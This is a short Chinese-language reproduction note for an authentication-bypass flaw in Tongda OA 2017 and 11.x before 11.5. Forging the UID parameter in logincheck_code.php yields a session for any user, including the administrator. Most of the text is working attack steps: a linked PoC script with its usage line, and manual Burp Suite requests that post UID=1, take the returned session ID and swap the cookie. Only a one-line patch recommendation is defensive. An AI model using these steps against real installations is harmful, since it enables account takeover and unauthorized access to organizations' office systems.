這位大佬有手工操作複現:
https://www.cnblogs.com/bink1/p/13328579.html
0x01 簡介
在 logincheck_code.php 檔案,變量 UID 為攻擊者可控,攻擊者可改變 UID 參數,進而控制該 SQL 語句傳回 USER 表中指定 uid參數的使用者資訊,便可通過僞造參數來達到登入任意使用者的目的。該漏洞可擷取任意使用者session,包括系統管理者
0x02 影響範圍
(1)通達OA2017
(2)通達 11.X<11.5版本
0x03 漏洞複現
(1)POC
https://github.com/NS-Sp4ce/TongDaOA-Fake-User#tongdaoa-fake-user
(2)使用方法:
python3 POC.py -v (2017|11) -url url
(3)通路
http://192.168.1.1/general/index.php
,F12将cookie修改為剛剛POC傳回的cookie
(4)成功登入系統
手工方式(burpsuite):
(1)POST /general/login_code.php,響應包擷取code_uid的值
(2)POST /logincheck_code.php 請求
CODEUID=code_uid&UID=1(POST資料内容)
(3)響應包擷取sessionID
(4)替換cookie就進OA了,proxy--options--Match and Replace--正規表達式^Cookie.*$,替換内容則為cookie字段完整的内容。
0x04 修複建議
官方已釋出最新修正版本,請及時更新更新檔